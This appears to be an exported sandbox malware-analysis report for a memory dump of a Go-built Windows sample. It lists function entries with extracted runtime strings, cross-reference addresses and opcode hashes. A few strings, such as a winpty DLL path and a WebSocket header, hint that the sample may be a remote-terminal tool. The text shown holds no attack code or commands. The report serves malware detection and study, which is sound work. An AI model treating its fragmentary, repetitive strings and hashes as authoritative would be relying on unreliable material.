!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 000002EBF9B9CBED
delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferencepanicwrap: unexpected string after package name: runtime.reflect_makemap: unsupported map key typeruntime: unexpe, xrefs: 000002EBF9B9D017
mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgcControllerState.findRunnable: blackening not enab, xrefs: 000002EBF9B9D05F

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferencepanicwrap: unexpected string after package name: runtime.reflect_makemap: unsupported map key typeruntime: unexpe$malloc deadlockmisaligned maskmissing mcache?preempt SPWRITEprofile cleanuprecovery failedruntime error: runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.Locktraceback stuck, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitG$malloc during signalnotetsleep not on g0p mcache not flushedreflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttrace: out of memorywirep: already in goworkbuf is not emptyws2_32.dll not foundasync stack too largecheckdead: runnable$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgcControllerState.findRunnable: blackening not enab
API String ID: 0-1770130935
Opcode ID: 6d11ec3154c0874ed31fbbc6377d8a75dcf360584e6cfab1c2c328e7708260b4
Instruction ID: da7735a18659078e2ef7d0e8fcf42f21d2b81efa389a3a8f510ebd8e1bd1dbe8
Opcode Fuzzy Hash: 6d11ec3154c0874ed31fbbc6377d8a75dcf360584e6cfab1c2c328e7708260b4
Instruction Fuzzy Hash: E532A172668BC482EB56CB95E84C79BBBB1F389B94F545112FE8D07BA6CB38C444C740

Function 000002EBF9B9BEC0 Relevance: 6.6, Strings: 5, Instructions: 349COMMON

Download Yara Rule

Strings

out of memory allocating heap arena metadataspan on userArena.faultList has invalid sizetotalFree and consistent stats are not equalunsafe.Slice: ptr is nil and len is not zeroexitsyscall: syscall frame is no longer validproduced a trigger greater than the hea, xrefs: 000002EBF9B9C266
out of memory allocating heap arena mapruntime: blocked write on free polldescstack growth not allowed in system callsuspendG from non-preemptible goroutinetrailing backslash at end of expressionbulkBarrierPreWrite: unaligned argumentscannot free workbufs when, xrefs: 000002EBF9B9C288
out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-e, xrefs: 000002EBF9B9C255
misrounded allocation in sysAllocruntime: failed to decommit pagesruntime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeshort slice passed to readGCStatsslice bounds out of range [%x:%y]stackalloc not on scheduler s, xrefs: 000002EBF9B9C55A
memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: name offset base pointer out of rangeruntime: text offset base pointer out of rangeruntime: type offset base poin, xrefs: 000002EBF9B9C56B

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: name offset base pointer out of rangeruntime: text offset base pointer out of rangeruntime: type offset base poin$misrounded allocation in sysAllocruntime: failed to decommit pagesruntime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeshort slice passed to readGCStatsslice bounds out of range [%x:%y]stackalloc not on scheduler s$out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-e$out of memory allocating heap arena mapruntime: blocked write on free polldescstack growth not allowed in system callsuspendG from non-preemptible goroutinetrailing backslash at end of expressionbulkBarrierPreWrite: unaligned argumentscannot free workbufs when$out of memory allocating heap arena metadataspan on userArena.faultList has invalid sizetotalFree and consistent stats are not equalunsafe.Slice: ptr is nil and len is not zeroexitsyscall: syscall frame is no longer validproduced a trigger greater than the hea
API String ID: 0-1340495620
Opcode ID: 954a1ee6e241a34381b57a320fe6660c656abc50605dc987fd95ace2491be0a4
Instruction ID: df72d5e9e21817716244088d2aa641737e9810efec203964946fdfb540fa34ca
Opcode Fuzzy Hash: 954a1ee6e241a34381b57a320fe6660c656abc50605dc987fd95ace2491be0a4
Instruction Fuzzy Hash: 54F1A132658BC482EB658B92F85839BB7A5F389B94F448121FF9D43B9ADF38C444C700

Function 000002EBF9BA90C0 Relevance: 5.5, Strings: 4, Instructions: 545COMMON

Download Yara Rule

Strings

., xrefs: 000002EBF9BA97A6
failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad span stateprogToPointerMask, xrefs: 000002EBF9BA9AAC
gcinggdot;geqq;gesl;gjcy;gnap;gneq;gob: gopf;gscangscr;gsim;gtcc;gvnE;hArr;half;harr;hbar;hchanhopf;hostshscr;httpsicirciecy;iexclimageimap2imap3imapsimof;indexinfininputint16int32int64iocy;iopf;iota;iscr;isin;ismapiuml;ja %djopf;jscr;kappakhcy;kind=kjcy;kopf;, xrefs: 000002EBF9BA9197, 000002EBF9BA91AD
gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid character class rangeinvalid function symbol tableinvalid length of trace eventneed padding in bucket (elem)notesleep - waitm out of syncruntime.semasleep wait_failedruntime: impossible type kin, xrefs: 000002EBF9BA9ABD

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: .$failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad span stateprogToPointerMask$gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid character class rangeinvalid function symbol tableinvalid length of trace eventneed padding in bucket (elem)notesleep - waitm out of syncruntime.semasleep wait_failedruntime: impossible type kin$gcinggdot;geqq;gesl;gjcy;gnap;gneq;gob: gopf;gscangscr;gsim;gtcc;gvnE;hArr;half;harr;hbar;hchanhopf;hostshscr;httpsicirciecy;iexclimageimap2imap3imapsimof;indexinfininputint16int32int64iocy;iopf;iota;iscr;isin;ismapiuml;ja %djopf;jscr;kappakhcy;kind=kjcy;kopf;
API String ID: 0-2320640504
Opcode ID: eca3fd70ae9e8ce71778d9f0f20cff4ae71f626d15a0a3e90cdb1a23c93a865c
Instruction ID: 18b0b6fbb57899a10e5bb1dfaae99e35ff1c30ec7bf71127701f92b3cacaeeb9
Opcode Fuzzy Hash: eca3fd70ae9e8ce71778d9f0f20cff4ae71f626d15a0a3e90cdb1a23c93a865c
Instruction Fuzzy Hash: 5B528F36284BC485EB1ADB65FC5839B73A5F79AB80F549122EA4D93BB6DF38C045C700

Function 000002EBF9BD9EC0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttrace: out of memorywirep: already in goworkbuf is not emptyws2_32.dll not foundasync stack too largecheckdead: runnable gconcurrent map writesdefer on system stackfindrunnable: wr, xrefs: 000002EBF9BD9F46
reflect.methodValueCallruntime: internal errorruntime: netpoll faileds.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forkunexpected trace readerwinpty/amd64/winpty.dllwork.nwait > work.nproc0000000, xrefs: 000002EBF9BD9F2C
reflect mismatchschedule: in cgoworkbuf is empty0123456789ABCDEFX: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing , xrefs: 000002EBF9BDA03E, 000002EBF9BDA078

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: reflect mismatchschedule: in cgoworkbuf is empty0123456789ABCDEFX: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing $reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttrace: out of memorywirep: already in goworkbuf is not emptyws2_32.dll not foundasync stack too largecheckdead: runnable gconcurrent map writesdefer on system stackfindrunnable: wr$reflect.methodValueCallruntime: internal errorruntime: netpoll faileds.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forkunexpected trace readerwinpty/amd64/winpty.dllwork.nwait > work.nproc0000000
API String ID: 0-1257680244
Opcode ID: 95b500adac7818ff41c671898fc2c4bc1e91dfaad49fca8bef0881bbb2573d7d
Instruction ID: b99287796891f03b09044619c6e4280a821b07e54103c672dd821a8436f462bf
Opcode Fuzzy Hash: 95b500adac7818ff41c671898fc2c4bc1e91dfaad49fca8bef0881bbb2573d7d
Instruction Fuzzy Hash: 1D519F33255A8086EB55DB59E88425FB761F38CF94F589222FB9D47BA6CB38C841CB40

Function 000002EBF9B96E40 Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

G waiting list is corruptedSec-WebSocket-Version: 13address not a stack addresscould not find QPC syscallsexpression nests too deeplyfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 000002EBF9B973A4
unreachableyYnNtTfFoO~000000000111123456789012SystemDaemonabi mismatchbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receiveclients.jsondumping heapentersyscallgcBitsArenaslfstack.pushmheapSpecialmspanSpecialself-preemptspanSetSpi, xrefs: 000002EBF9B96FF0

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: G waiting list is corruptedSec-WebSocket-Version: 13address not a stack addresscould not find QPC syscallsexpression nests too deeplyfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b$unreachableyYnNtTfFoO~000000000111123456789012SystemDaemonabi mismatchbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receiveclients.jsondumping heapentersyscallgcBitsArenaslfstack.pushmheapSpecialmspanSpecialself-preemptspanSetSpi
API String ID: 0-2957494915
Opcode ID: 77bd0e38e5f5982ede126ac5e92e826ea80e6b23dfead42d5381c9aa8d03071e
Instruction ID: ec74f2ed29f0dd6b2ce3eacfa74a228ce75c864dad07513e69495b661235fbd9
Opcode Fuzzy Hash: 77bd0e38e5f5982ede126ac5e92e826ea80e6b23dfead42d5381c9aa8d03071e
Instruction Fuzzy Hash: 5E12C032654BC0C5EB669BA5E88839BB7A1F789BC4F589025EA8C47F97CF39C445C700

Function 000002EBF9B960A0 Relevance: 2.9, Strings: 2, Instructions: 381COMMON

Download Yara Rule

Strings

G waiting list is corruptedSec-WebSocket-Version: 13address not a stack addresscould not find QPC syscallsexpression nests too deeplyfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 000002EBF9B96686
unreachableyYnNtTfFoO~000000000111123456789012SystemDaemonabi mismatchbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receiveclients.jsondumping heapentersyscallgcBitsArenaslfstack.pushmheapSpecialmspanSpecialself-preemptspanSetSpi, xrefs: 000002EBF9B9619B

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: G waiting list is corruptedSec-WebSocket-Version: 13address not a stack addresscould not find QPC syscallsexpression nests too deeplyfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b$unreachableyYnNtTfFoO~000000000111123456789012SystemDaemonabi mismatchbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receiveclients.jsondumping heapentersyscallgcBitsArenaslfstack.pushmheapSpecialmspanSpecialself-preemptspanSetSpi
API String ID: 0-2957494915
Opcode ID: 11d79b3a968004e7fb28b46a2e5ef033e7405d2f8df992a2486bc642dfc512ad
Instruction ID: ce23fb66733e3e63878320e3479996161832aeb1727c012b8b286a48c8846376
Opcode Fuzzy Hash: 11d79b3a968004e7fb28b46a2e5ef033e7405d2f8df992a2486bc642dfc512ad
Instruction Fuzzy Hash: FB02B132654AC4C5EB629BA1E84839F77A1F749BE4F545225EA5847FEBCB39C440C700

Function 000002EBF9BC2420 Relevance: 2.7, Strings: 2, Instructions: 249COMMON

Download Yara Rule

Strings

runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added ou, xrefs: 000002EBF9BC286E
self-preemptspanSetSpinestop tracingsweepWaitersthreadcreatetraceStringsunexpected ) is nil, not , not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMem, xrefs: 000002EBF9BC287F

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsattempted to add zero-sized address rangegcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added ou$self-preemptspanSetSpinestop tracingsweepWaitersthreadcreatetraceStringsunexpected ) is nil, not , not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMem
API String ID: 0-316462326
Opcode ID: 5adf23e6c8f2dbd366cdfe0291caa68755849bf4419e150f0f0e7ab4aeeeff07
Instruction ID: 1105af5d0889f7cb4ab26a1d222d4dc5e90ba5d4a6cfd43b29f74676e1b6e21b
Opcode Fuzzy Hash: 5adf23e6c8f2dbd366cdfe0291caa68755849bf4419e150f0f0e7ab4aeeeff07
Instruction Fuzzy Hash: A4C15036644BC081DB16DB65F85839B7764F74AB94F149236FAAC93BAADF38C481C700

Function 000002EBF9BC5280 Relevance: 2.7, Strings: 2, Instructions: 246COMMON

Download Yara Rule

Strings

invalid g statusmSpanList.insertmSpanList.removemissing stackmapreflect mismatchschedule: in cgoworkbuf is empty0123456789ABCDEFX: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 wo, xrefs: 000002EBF9BC5696
suspendG from non-preemptible goroutinetrailing backslash at end of expressionbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0deferproc: d.panic != nil after newdeferfailed to acquire lock to reset capacityinvalid span in heapAr, xrefs: 000002EBF9BC56A7

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: invalid g statusmSpanList.insertmSpanList.removemissing stackmapreflect mismatchschedule: in cgoworkbuf is empty0123456789ABCDEFX: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 wo$suspendG from non-preemptible goroutinetrailing backslash at end of expressionbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0deferproc: d.panic != nil after newdeferfailed to acquire lock to reset capacityinvalid span in heapAr
API String ID: 0-2255214916
Opcode ID: 79d9f0e98924ef4d4155af138ba6c56a6ef0703232343b2c22c5450da7168c05
Instruction ID: 4f321f5a398428553fb23de277677379071cd578ad38fcd49b6d85ce0d5eb316
Opcode Fuzzy Hash: 79d9f0e98924ef4d4155af138ba6c56a6ef0703232343b2c22c5450da7168c05
Instruction Fuzzy Hash: 47B1617664CBC086E715CB96E44875FBB61F38ABC0F145126FAA903F9ADB79C4418B00

Function 000002EBF9BC7EA0 Relevance: 2.7, Strings: 2, Instructions: 237COMMON

Download Yara Rule

Strings

casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferencepanicwrap: unexpected string after package name: runtime.reflect, xrefs: 000002EBF9BC8225
